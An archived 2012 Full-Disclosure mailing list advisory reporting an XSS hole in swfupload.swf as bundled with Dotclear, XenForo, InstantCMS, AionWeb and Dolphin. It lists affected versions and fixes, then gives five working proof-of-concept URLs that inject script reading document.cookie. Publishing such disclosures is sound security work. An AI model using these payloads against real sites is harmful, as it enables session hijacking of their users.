lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <003301cdc1e9$443f43f0$9b7a6fd5@ml>
Date: Tue, 13 Nov 2012 23:52:12 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: XSS vulnerability in web applications with
	swfupload: Dotclear, XenForo, InstantCMS, AionWeb, Dolphin

Hello list!

I will draw your attention to XSS vulnerability in other web applications 
with swfupload. Earlier I've wrote about swfupload in WordPress 
(CVE-2012-3414) and that this hole is available in many web applications.

In previous letter I've wrote the information about different versions of 
this swf-file (with different names) and all versions of WordPress, which 
contain any of these swf-files. And here is information about Dotclear, 
XenForo, InstantCMS, AionWeb, Dolphin - among multiple web applications 
which are bundled with swfupload.swf.

-------------------------
Affected products:
-------------------------

Vulnerable are potentially all versions of Dotclear, InstantCMS, AionWeb, 
Dolphin. There is no information that they have fixed this vulnerability in 
their software (at that this vulnerability was fixed in WordPress 3.3.2 at 
20.04.2012).

Vulnerable are versions XenForo 1.0.0 - 1.1.2. In XenForo 1.1.3 this 
vulnerability was fixed and patch was released for previous versions 
(already at 19.06.2012).

The developers of WordPress released new version of flash file (the same did 
the developers of XenForo), which could be used by all web developers, which 
were using swfupload.

----------
Details:
----------

XSS (WASC-08):

Dotclear:

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

XenForo:

http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

InstantCMS:

http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Dolphin:

http://site/plugins/swfupload/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Swfupload is used in WordPress, plugins for WP and in other web 
applications. There are many web applications with it, not as many as those 
which are using JW Player (http://securityvulns.com/docs28176.html) and JW 
Player Pro (http://securityvulns.com/docs28483.html) (vulnerabilities in 
them I've disclosed earlier), but still a lot of.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ